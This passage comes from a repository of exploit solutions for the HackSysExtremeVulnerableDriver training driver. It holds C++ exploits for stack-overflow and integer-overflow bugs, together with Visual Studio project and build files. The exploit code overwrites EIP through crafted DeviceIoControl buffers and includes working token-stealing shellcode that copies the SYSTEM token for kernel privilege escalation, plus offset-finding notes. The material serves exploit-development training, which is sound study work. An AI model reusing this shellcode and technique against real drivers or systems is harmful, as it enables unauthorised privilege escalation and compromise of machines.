 94 | 		root@kali:~*censored*# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 43327243 -l 2128 
 95 | 		[*] Exact match at offset 2076
 96 | 		root@kali:~*censored*# 
 97 | 
 98 | 		*/
 99 | 		// Thanks to https://stackoverflow.com/questions/1163624/memcpy-with-startindex for this
100 | 		// Overwrite EIP
101 | 		memcpy(&buffer[0x820], &shellcodeAddress, 4);
102 | 		// Overwrite EBP
103 | 		memcpy(&buffer[0x81C], "\x44\x44\x44\x44", 4);
104 | 		printf("\r\nSending buffer!\r\n");
105 | 		printf("Buffer length: %i\r\n", sizeof(buffer));
106 | 		printf("IOCTL: 0x222003\r\n");
107 | 
108 | 		DWORD  bytesReturned = 0;
109 | 		// Thanks to https://msdn.microsoft.com/en-us/library/windows/desktop/aa363147(v=vs.85).aspx for how to call this correctly for last 2 args.
110 | 		if ((DeviceIoControl(driverHandle, 0x222003, &buffer, sizeof(buffer), NULL, 0, &bytesReturned, (LPOVERLAPPED)NULL) == 0)) {
111 | 			printf("DeviceIoControl call failed...\r\n");
112 | 		}
113 | 		else {
114 | 			printf("DeviceIoControl call succeeded!\r\n");
115 | 			STARTUPINFOA si;
116 | 			PROCESS_INFORMATION pi;
117 | 
118 | 			ZeroMemory(&si, sizeof(si));
119 | 			si.cb = sizeof(si);
120 | 			ZeroMemory(&pi, sizeof(pi));
121 | 			CreateProcessA("C:\\Windows\\system32\\cmd.exe", NULL, NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
122 | 		}
123 | 	}
124 | 	return 0;
125 | }


--------------------------------------------------------------------------------
/Exploit-StackOverflow/Exploit-StackOverflow/Exploit-StackOverflow.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>15.0</VCProjectVersion>
 23 |     <ProjectGuid>{7E50BAF9-3D3D-4A96-B0EB-DF6726C2515B}</ProjectGuid>
 24 |     <Keyword>Win32Proj</Keyword>
 25 |     <RootNamespace>ExploitStackOverflow</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0.15063.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>Application</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <PlatformToolset>v141</PlatformToolset>
 33 |     <CharacterSet>Unicode</CharacterSet>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>Application</ConfigurationType>
 37 |     <UseDebugLibraries>false</UseDebugLibraries>
 38 |     <PlatformToolset>v141</PlatformToolset>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <CharacterSet>Unicode</CharacterSet>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 43 |     <ConfigurationType>Application</ConfigurationType>
 44 |     <UseDebugLibraries>true</UseDebugLibraries>
 45 |     <PlatformToolset>v141</PlatformToolset>
 46 |     <CharacterSet>Unicode</CharacterSet>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 49 |     <ConfigurationType>Application</ConfigurationType>
 50 |     <UseDebugLibraries>false</UseDebugLibraries>
 51 |     <PlatformToolset>v141</PlatformToolset>
 52 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 53 |     <CharacterSet>Unicode</CharacterSet>
 54 |   </PropertyGroup>
 55 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 56 |   <ImportGroup Label="ExtensionSettings">
 57 |   </ImportGroup>
 58 |   <ImportGroup Label="Shared">
 59 |   </ImportGroup>
 60 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 61 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 62 |   </ImportGroup>
 63 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 64 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 65 |   </ImportGroup>
 66 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 67 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 68 |   </ImportGroup>
 69 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 70 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 71 |   </ImportGroup>
 72 |   <PropertyGroup Label="UserMacros" />
 73 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 74 |     <LinkIncremental>true</LinkIncremental>
 75 |   </PropertyGroup>
 76 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 77 |     <LinkIncremental>true</LinkIncremental>
 78 |   </PropertyGroup>
 79 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 80 |     <LinkIncremental>false</LinkIncremental>
 81 |   </PropertyGroup>
 82 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 83 |     <LinkIncremental>false</LinkIncremental>
 84 |   </PropertyGroup>
 85 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 86 |     <ClCompile>
 87 |       <PrecompiledHeader>Use</PrecompiledHeader>
 88 |       <WarningLevel>Level3</WarningLevel>
 89 |       <Optimization>Disabled</Optimization>
 90 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 91 |     </ClCompile>
 92 |     <Link>
 93 |       <SubSystem>Console</SubSystem>
 94 |     </Link>
 95 |   </ItemDefinitionGroup>
 96 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 97 |     <ClCompile>
 98 |       <PrecompiledHeader>Use</PrecompiledHeader>
 99 |       <WarningLevel>Level3</WarningLevel>
100 |       <Optimization>Disabled</Optimization>
101 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
102 |     </ClCompile>
103 |     <Link>
104 |       <SubSystem>Console</SubSystem>
105 |     </Link>
106 |   </ItemDefinitionGroup>
107 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
108 |     <ClCompile>
109 |       <WarningLevel>Level3</WarningLevel>
110 |       <PrecompiledHeader>Use</PrecompiledHeader>
111 |       <Optimization>MaxSpeed</Optimization>
112 |       <FunctionLevelLinking>true</FunctionLevelLinking>
113 |       <IntrinsicFunctions>true</IntrinsicFunctions>
114 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
115 |     </ClCompile>
116 |     <Link>
117 |       <SubSystem>Console</SubSystem>
118 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
119 |       <OptimizeReferences>true</OptimizeReferences>
120 |     </Link>
121 |   </ItemDefinitionGroup>
122 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
123 |     <ClCompile>
124 |       <WarningLevel>Level3</WarningLevel>
125 |       <PrecompiledHeader>Use</PrecompiledHeader>
126 |       <Optimization>MaxSpeed</Optimization>
127 |       <FunctionLevelLinking>true</FunctionLevelLinking>
128 |       <IntrinsicFunctions>true</IntrinsicFunctions>
129 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
130 |     </ClCompile>
131 |     <Link>
132 |       <SubSystem>Console</SubSystem>
133 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
134 |       <OptimizeReferences>true</OptimizeReferences>
135 |     </Link>
136 |   </ItemDefinitionGroup>
137 |   <ItemGroup>
138 |     <Text Include="ReadMe.txt" />
139 |   </ItemGroup>
140 |   <ItemGroup>
141 |     <ClInclude Include="stdafx.h" />
142 |     <ClInclude Include="targetver.h" />
143 |   </ItemGroup>
144 |   <ItemGroup>
145 |     <ClCompile Include="Exploit-StackOverflow.cpp" />
146 |     <ClCompile Include="stdafx.cpp">
147 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
148 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
149 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
150 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
151 |     </ClCompile>
152 |   </ItemGroup>
153 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
154 |   <ImportGroup Label="ExtensionTargets">
155 |   </ImportGroup>
156 | </Project>


--------------------------------------------------------------------------------
/Exploit-StackOverflow/Exploit-StackOverflow/Exploit-StackOverflow.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <Text Include="ReadMe.txt" />
19 |   </ItemGroup>
20 |   <ItemGroup>
21 |     <ClInclude Include="stdafx.h">
22 |       <Filter>Header Files</Filter>
23 |     </ClInclude>
24 |     <ClInclude Include="targetver.h">
25 |       <Filter>Header Files</Filter>
26 |     </ClInclude>
27 |   </ItemGroup>
28 |   <ItemGroup>
29 |     <ClCompile Include="stdafx.cpp">
30 |       <Filter>Source Files</Filter>
31 |     </ClCompile>
32 |     <ClCompile Include="Exploit-StackOverflow.cpp">
33 |       <Filter>Source Files</Filter>
34 |     </ClCompile>
35 |   </ItemGroup>
36 | </Project>


--------------------------------------------------------------------------------
/Exploit-StackOverflow/Exploit-StackOverflow/ReadMe.txt:
--------------------------------------------------------------------------------
 1 | ========================================================================
 2 |     CONSOLE APPLICATION : Exploit-StackOverflow Project Overview
 3 | ========================================================================
 4 | 
 5 | AppWizard has created this Exploit-StackOverflow application for you.
 6 | 
 7 | This file contains a summary of what you will find in each of the files that
 8 | make up your Exploit-StackOverflow application.
 9 | 
10 | 
11 | Exploit-StackOverflow.vcxproj
12 |     This is the main project file for VC++ projects generated using an Application Wizard.
13 |     It contains information about the version of Visual C++ that generated the file, and
14 |     information about the platforms, configurations, and project features selected with the
15 |     Application Wizard.
16 | 
17 | Exploit-StackOverflow.vcxproj.filters
18 |     This is the filters file for VC++ projects generated using an Application Wizard. 
19 |     It contains information about the association between the files in your project 
20 |     and the filters. This association is used in the IDE to show grouping of files with
21 |     similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 |     "Source Files" filter).
23 | 
24 | Exploit-StackOverflow.cpp
25 |     This is the main application source file.
26 | 
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 | 
30 | StdAfx.h, StdAfx.cpp
31 |     These files are used to build a precompiled header (PCH) file
32 |     named Exploit-StackOverflow.pch and a precompiled types file named StdAfx.obj.
33 | 
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 | 
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 | 
40 | /////////////////////////////////////////////////////////////////////////////
41 | 


--------------------------------------------------------------------------------
/Exploit-StackOverflow/Exploit-StackOverflow/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // Exploit-StackOverflow.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 | 
5 | #include "stdafx.h"
6 | 
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 | 


--------------------------------------------------------------------------------
/Exploit-StackOverflow/Exploit-StackOverflow/stdafx.h:
--------------------------------------------------------------------------------
 1 | // stdafx.h : include file for standard system include files,
 2 | // or project specific include files that are used frequently, but
 3 | // are changed infrequently
 4 | //
 5 | 
 6 | #pragma once
 7 | 
 8 | #include "targetver.h"
 9 | 
10 | #include <stdio.h>
11 | #include <tchar.h>
12 | 
13 | 
14 | 
15 | // TODO: reference additional headers your program requires here
16 | 


--------------------------------------------------------------------------------
/Exploit-StackOverflow/Exploit-StackOverflow/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | 
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 | 
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 | 
8 | #include <SDKDDKVer.h>
9 | 


--------------------------------------------------------------------------------
/HEVD - Integer Overflow Exploit/Debug/HEVD - Integer Overflow Exploit.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD - Integer Overflow Exploit/Debug/HEVD - Integer Overflow Exploit.exe


--------------------------------------------------------------------------------
/HEVD - Integer Overflow Exploit/Debug/HEVD - Integer Overflow Exploit.ilk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD - Integer Overflow Exploit/Debug/HEVD - Integer Overflow Exploit.ilk


--------------------------------------------------------------------------------
/HEVD - Integer Overflow Exploit/Debug/HEVD - Integer Overflow Exploit.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD - Integer Overflow Exploit/Debug/HEVD - Integer Overflow Exploit.pdb


--------------------------------------------------------------------------------
/HEVD - Integer Overflow Exploit/HEVD - Integer Overflow Exploit.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio 15
 4 | VisualStudioVersion = 15.0.26430.15
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HEVD - Integer Overflow Exploit", "HEVD - Integer Overflow Exploit\HEVD - Integer Overflow Exploit.vcxproj", "{0E8499B0-F7B7-4FD5-B340-EB570568CAEE}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{0E8499B0-F7B7-4FD5-B340-EB570568CAEE}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{0E8499B0-F7B7-4FD5-B340-EB570568CAEE}.Debug|x64.Build.0 = Debug|x64
18 | 		{0E8499B0-F7B7-4FD5-B340-EB570568CAEE}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{0E8499B0-F7B7-4FD5-B340-EB570568CAEE}.Debug|x86.Build.0 = Debug|Win32
20 | 		{0E8499B0-F7B7-4FD5-B340-EB570568CAEE}.Release|x64.ActiveCfg = Release|x64
21 | 		{0E8499B0-F7B7-4FD5-B340-EB570568CAEE}.Release|x64.Build.0 = Release|x64
22 | 		{0E8499B0-F7B7-4FD5-B340-EB570568CAEE}.Release|x86.ActiveCfg = Release|Win32
23 | 		{0E8499B0-F7B7-4FD5-B340-EB570568CAEE}.Release|x86.Build.0 = Release|Win32
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | EndGlobal
29 | 


--------------------------------------------------------------------------------
/HEVD - Integer Overflow Exploit/HEVD - Integer Overflow Exploit/Debug/HEVD - I.0E8499B0.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD - Integer Overflow Exploit/HEVD - Integer Overflow Exploit/Debug/HEVD - I.0E8499B0.tlog/CL.command.1.tlog


--------------------------------------------------------------------------------
/HEVD - Integer Overflow Exploit/HEVD - Integer Overflow Exploit/Debug/HEVD - I.0E8499B0.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD - Integer Overflow Exploit/HEVD - Integer Overflow Exploit/Debug/HEVD - I.0E8499B0.tlog/CL.read.1.tlog


--------------------------------------------------------------------------------
/HEVD - Integer Overflow Exploit/HEVD - Integer Overflow Exploit/Debug/HEVD - I.0E8499B0.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD - Integer Overflow Exploit/HEVD - Integer Overflow Exploit/Debug/HEVD - I.0E8499B0.tlog/CL.write.1.tlog


--------------------------------------------------------------------------------
/HEVD - Integer Overflow Exploit/HEVD - Integer Overflow Exploit/Debug/HEVD - I.0E8499B0.tlog/HEVD - Integer Overflow Exploit.lastbuildstate:
--------------------------------------------------------------------------------
1 | #TargetFrameworkVersion=v4.0:PlatformToolSet=v141:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0.15063.0
2 | Debug|Win32|C:\Users\gwilcox\Documents\Visual Studio 2017\Projects\HEVD - Integer Overflow Exploit\|
3 | 


--------------------------------------------------------------------------------
/HEVD - Integer Overflow Exploit/HEVD - Integer Overflow Exploit/Debug/HEVD - I.0E8499B0.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD - Integer Overflow Exploit/HEVD - Integer Overflow Exploit/Debug/HEVD - I.0E8499B0.tlog/link.command.1.tlog


--------------------------------------------------------------------------------
/HEVD - Integer Overflow Exploit/HEVD - Integer Overflow Exploit/Debug/HEVD - I.0E8499B0.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD - Integer Overflow Exploit/HEVD - Integer Overflow Exploit/Debug/HEVD - I.0E8499B0.tlog/link.read.1.tlog


--------------------------------------------------------------------------------
/HEVD - Integer Overflow Exploit/HEVD - Integer Overflow Exploit/Debug/HEVD - I.0E8499B0.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD - Integer Overflow Exploit/HEVD - Integer Overflow Exploit/Debug/HEVD - I.0E8499B0.tlog/link.write.1.tlog


--------------------------------------------------------------------------------
/HEVD - Integer Overflow Exploit/HEVD - Integer Overflow Exploit/Debug/HEVD - Integer Overflow Exploit.log:
--------------------------------------------------------------------------------
1 |   HEVD - Integer Overflow Exploit.cpp
2 | c:\users\gwilcox\documents\visual studio 2017\projects\hevd - integer overflow exploit\hevd - integer overflow exploit\hevd - integer overflow exploit.cpp(16): warning C4477: 'printf' : format string '%i' requires an argument of type 'int', but variadic argument 1 has type 'HANDLE'
3 |   HEVD - Integer Overflow Exploit.vcxproj -> C:\Users\gwilcox\Documents\Visual Studio 2017\Projects\HEVD - Integer Overflow Exploit\Debug\HEVD - Integer Overflow Exploit.exe
4 |   HEVD - Integer Overflow Exploit.vcxproj -> C:\Users\gwilcox\Documents\Visual Studio 2017\Projects\HEVD - Integer Overflow Exploit\Debug\HEVD - Integer Overflow Exploit.pdb (Partial PDB)
5 | 


--------------------------------------------------------------------------------
/HEVD - Integer Overflow Exploit/HEVD - Integer Overflow Exploit/Debug/HEVD - Integer Overflow Exploit.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD - Integer Overflow Exploit/HEVD - Integer Overflow Exploit/Debug/HEVD - Integer Overflow Exploit.obj


--------------------------------------------------------------------------------
/HEVD - Integer Overflow Exploit/HEVD - Integer Overflow Exploit/Debug/HEVD - Integer Overflow Exploit.pch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD - Integer Overflow Exploit/HEVD - Integer Overflow Exploit/Debug/HEVD - Integer Overflow Exploit.pch


--------------------------------------------------------------------------------
/HEVD - Integer Overflow Exploit/HEVD - Integer Overflow Exploit/Debug/stdafx.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD - Integer Overflow Exploit/HEVD - Integer Overflow Exploit/Debug/stdafx.obj


--------------------------------------------------------------------------------
/HEVD - Integer Overflow Exploit/HEVD - Integer Overflow Exploit/Debug/vc141.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD - Integer Overflow Exploit/HEVD - Integer Overflow Exploit/Debug/vc141.idb


--------------------------------------------------------------------------------
/HEVD - Integer Overflow Exploit/HEVD - Integer Overflow Exploit/Debug/vc141.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD - Integer Overflow Exploit/HEVD - Integer Overflow Exploit/Debug/vc141.pdb


--------------------------------------------------------------------------------
/HEVD - Integer Overflow Exploit/HEVD - Integer Overflow Exploit/HEVD - Integer Overflow Exploit.cpp:
--------------------------------------------------------------------------------
 1 | #include "stdafx.h"
 2 | #include "windows.h"
 3 | 
 4 | int main()
 5 | {
 6 | 	printf("Starting exploitation of HEVD integer overflow\r\n");
 7 | 	printf("Exploit by @tekwizz123\r\n");
 8 | 	printf("-----------------------------------------------------\r\n\r\n");
 9 | 
10 | 	printf("Opening handle to device...\r\n");
11 | 	HANDLE devHandle = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", FILE_READ_ACCESS | FILE_WRITE_ACCESS, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL, NULL);
12 | 	if (devHandle == INVALID_HANDLE_VALUE) {
13 | 		printf("Could not open handle to HEVD driver.\r\n");
14 | 		return 1;
15 | 	}
16 | 	printf("Device handle: %i\r\n", devHandle);
17 | 
18 | 	printf("Setting up input for IOCTL call.\r\n");
19 | 	DWORD bytesReturned = 0; // Need something to hold bytes returned so lets allocate a DWORD for this purpose. We will pass a pointer to this DWORD when we call DeviceIOControl.
20 | 	byte inBuffer[0x830] = { 0 }; // Set up the inBuffer byte buffer holding our input to the IOCTL call.
21 | 
22 | 	/* SUPER IMPORTANT! The buffer is 0x800 in size. For some reason if we overflow it with 0x900 0x41's we can analyze the stack fine with !analyze -v but trying
23 | 	 other characters won't work. Its actually easier if we do a smaller overflow, say 0x830 bytes, which will allow the program to try execute the address we overwrite
24 | 	 EIP with. Much, much, much, ...., much easier. :)
25 | 
26 | 	Anyway for reference here is the code I used to try figure out the offsets:
27 | 
28 | 	memset(inBuffer, '\x41', 0x830);
29 | 	memset(inBuffer+0x800, '\x42', 4);
30 | 	memset(inBuffer + 0x804, '\x43', 4);
31 | 	memset(inBuffer + 0x808, '\x44', 4);
32 | 	memset(inBuffer + 0x80C, '\x45', 4);
33 | 	memset(inBuffer + 0x810, '\x46', 4);
34 | 	memset(inBuffer + 0x814, '\x47', 4);
35 | 	memset(inBuffer + 0x818, '\x48', 4);
36 | 	memset(inBuffer + 0x81C, '\x49', 4);
37 | 	memset(inBuffer + 0x820, '\x4A', 4);
38 | 	memset(inBuffer + 0x824, '\x4B', 4);
39 | 	memset(inBuffer + 0x828, '\x4C', 4);
40 | 	memset(inBuffer + 0x82C, '\x4D', 4);
41 | 	memcpy(inBuffer + 0x830-4, "\xb0\xb0\xd0\xba", 4);
42 | 
43 | 	*/
44 | 	
45 | 	printf("Allocating shellcode...\r\n");
46 | 	char shellcode[66] = (
47 | 		"\x60" // PUSHAD
48 | 		"\x64\xA1\x24\x01\x00\x00" // MOV EAX, fs:[KTHREAD_OFFSET]
49 | 		"\x8B\x40\x50" // MOV EAX, [EAX + EPROCESS_OFFSET]
50 | 		"\x89\xC1" // mov ecx, eax (Current EPROCESS structure)
51 | 		"\x8B\x98\xF8\x00\x00\x00" // mov ebx, [eax + TOKEN_OFFSET]
52 | 								   // #---[Copy System PID token]
53 | 		"\xBA\x04\x00\x00\x00" // mov edx, 4 (SYSTEM PID)
54 | 		"\x8B\x80\xB8\x00\x00\x00" // mov eax, [eax + FLINK_OFFSET] <-|
55 | 		"\x2D\xB8\x00\x00\x00" //               sub eax, FLINK_OFFSET |
56 | 		"\x39\x90\xB4\x00\x00\x00" //      cmp[eax + PID_OFFSET], edx |
57 | 		"\x75\xED" // jnz                                          -> |
58 | 		"\x8B\x90\xF8\x00\x00\x00" // mov edx, [eax + TOKEN_OFFSET]
59 | 		"\x89\x91\xF8\x00\x00\x00" // mov[ecx + TOKEN_OFFSET], edx
60 | 								   //#---[Recover]
61 | 		"\x61" // popad
62 | 		"\x31\xC0" // Set NTSTATUS->STATUS_SUCCESS so calling function thinks we exited successfully
63 | 		// *NOTE THIS IS DIFFERENT AS WE NEED TO REPLICATE THE POP EBP, RET 8 FROM THE ORIGINAL CODE
64 | 		"\x5D" // POP EBP
65 | 		"\xC2\x08\x00" // RET 8 
66 | 		);
67 | 	printf("Shellcode size: %i\r\n", sizeof(shellcode));
68 | 
69 | 	printf("Reserving RWX memory for shellcode with VirtualAlloc\r\n");
70 | 	LPVOID shellcodeAddress = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
71 | 	printf("Copying shellcode into this memory\r\n");
72 | 	memcpy(shellcodeAddress, shellcode, sizeof(shellcode));
73 | 	LPVOID sourceAddress = &shellcodeAddress;
74 | 
75 | 	printf("Setting up the 0x830 sized buffer we will send.\r\n");
76 | 	memset(inBuffer, '\x41', 0x830); // Initalize the buffer to be all 0x41's
77 | 	memcpy(inBuffer + 0x828, sourceAddress, 4); // After 0x828 bytes, the next 4 bytes in whatever buffer we send start to overwrite EIP. So make sure we overwrite it with the address of our shellcode.
78 | 	memcpy(inBuffer + 0x830 - 4, "\xb0\xb0\xd0\xba", 4); // Fill end of buffer with terminating bytes aka 0xBAD0B0B0
79 | 
80 | 	printf("Sending driver the IOCTL message.\r\n");
